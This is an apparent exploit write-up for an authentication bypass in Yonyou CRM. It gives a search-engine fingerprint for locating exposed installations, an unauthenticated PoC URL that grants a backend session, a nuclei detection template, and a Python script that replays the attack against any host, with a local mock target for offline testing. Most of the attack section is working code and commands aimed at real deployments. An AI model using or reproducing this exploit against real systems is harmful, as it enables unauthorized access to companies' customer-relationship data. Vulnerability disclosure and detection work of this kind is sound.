Yonyou (用友) CRM: logic flaw allows logging into the backend directly


Hunter (鹰图) fingerprint

```
app.name="用友 CRM"
```

PoC

```
/background/reservationcomplete.php?ID=1
```

Requesting the PoC path without any credentials returns a blank page. That request is enough: the script establishes a backend session for the client, so opening the site root afterwards in the same browser session lands directly in the logged-in backend. The flaw is that `reservationcomplete.php` is reachable unauthenticated and hands out a valid backend session rather than checking who is asking.

nuclei

```yaml
id: yongyouU8_CRM-reservationcomplete

info:
  name: Yonyou CRM logic flaw allows logging into the backend directly
  author: wy876
  severity: high

http:
  # Request 2 must carry the session cookie set by request 1. nuclei v3 reuses
  # cookies across raw requests by default; on nuclei v2 add `cookie-reuse: true`
  # here or the matcher on body_2 never fires.
  - raw:
      - |
        GET /background/reservationcomplete.php?ID=1 HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)

      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)

    # body_2 is the response to the second request (the site root); the string
    # below only appears when the backend already treats the client as logged in.
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2,"\"msg\": \"bgsesstimeout-\", \"serverName\"")'
```
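The two-step check above only works if the second request carries whatever session cookie the first one set, which is the easy thing to get wrong when porting the template to a script. The following is an added example, not code from the original post or from wy876: a stdlib-only Python replay of the PoC with an explicit cookie jar, plus a constructed mock target so it can be exercised offline. The mock's behaviour (a `PHPSESSID` cookie issued by the PoC script, the matcher string served at `/` only when that cookie is present) is an assumption made for the demo, not something taken from the write-up; the PoC path, the User-Agent and the indicator string are the template's own.

```python
import http.cookiejar
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# PoC path from the write-up, and the indicator string the nuclei matcher
# looks for in the second (site root) response.
POC_PATH = "/background/reservationcomplete.php?ID=1"
INDICATOR = '"msg": "bgsesstimeout-", "serverName"'
UA = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)"


def is_logged_in(body: str) -> bool:
    """Same test as the template's DSL matcher on body_2."""
    return INDICATOR in body


def check(base_url: str, reuse_cookies: bool = True, timeout: float = 10.0) -> dict:
    """Replay the PoC: hit the unauthenticated script, then request the root.

    reuse_cookies=True keeps one cookie jar across both requests, which is what
    the template relies on; False sends the second request without the session
    cookie, i.e. what a scanner without cookie reuse would do.
    """
    jar = http.cookiejar.CookieJar()
    handlers = [urllib.request.HTTPCookieProcessor(jar)] if reuse_cookies else []
    opener = urllib.request.build_opener(*handlers)

    def get(path: str):
        req = urllib.request.Request(base_url.rstrip("/") + path, headers={"User-Agent": UA})
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")

    poc_status, poc_body = get(POC_PATH)
    _, home_body = get("/")
    return {
        "poc_status": poc_status,
        "poc_blank": poc_body.strip() == "",      # write-up: the PoC page is blank
        "cookies": sorted(c.name for c in jar),    # what request 1 handed out
        "vulnerable": is_logged_in(home_body),
    }


class _MockCRM(BaseHTTPRequestHandler):
    """Constructed stand-in for a vulnerable target, for offline testing only.

    Assumptions (not from the write-up): the session is a PHPSESSID cookie,
    and the PoC script issues it without any authentication.
    """

    def do_GET(self):
        if self.path == POC_PATH:
            self.send_response(200)
            self.send_header("Set-Cookie", "PHPSESSID=constructed-session; Path=/")
            self.send_header("Content-Type", "text/html")
            self.end_headers()                     # blank body, as in the write-up
            return
        if self.path == "/":
            has_session = "PHPSESSID=constructed-session" in self.headers.get("Cookie", "")
            body = ('{"msg": "bgsesstimeout-", "serverName": "crm"}'
                    if has_session else "<form>login</form>")
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            self.wfile.write(body.encode())
            return
        self.send_response(404)
        self.end_headers()

    def log_message(self, *args):                  # keep the demo quiet
        pass


def run_mock(port: int = 0):
    """Start the mock target on 127.0.0.1; returns (server, base_url)."""
    srv = ThreadingHTTPServer(("127.0.0.1", port), _MockCRM)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_address[1]


if __name__ == "__main__":
    srv, url = run_mock()
    try:
        print("with cookie reuse:   ", check(url, reuse_cookies=True))
        print("without cookie reuse:", check(url, reuse_cookies=False))
    finally:
        srv.shutdown()
```

Against a real host, call `check("https://target")` and look at `vulnerable`; the `poc_blank` and `cookies` fields are there so a finding can be written up with the evidence the post describes (blank PoC response, a session handed out by the script). Running the mock with `reuse_cookies=False` shows the failure mode the nuclei comment warns about: the root page is served unauthenticated and the matcher never fires, even though the target is vulnerable.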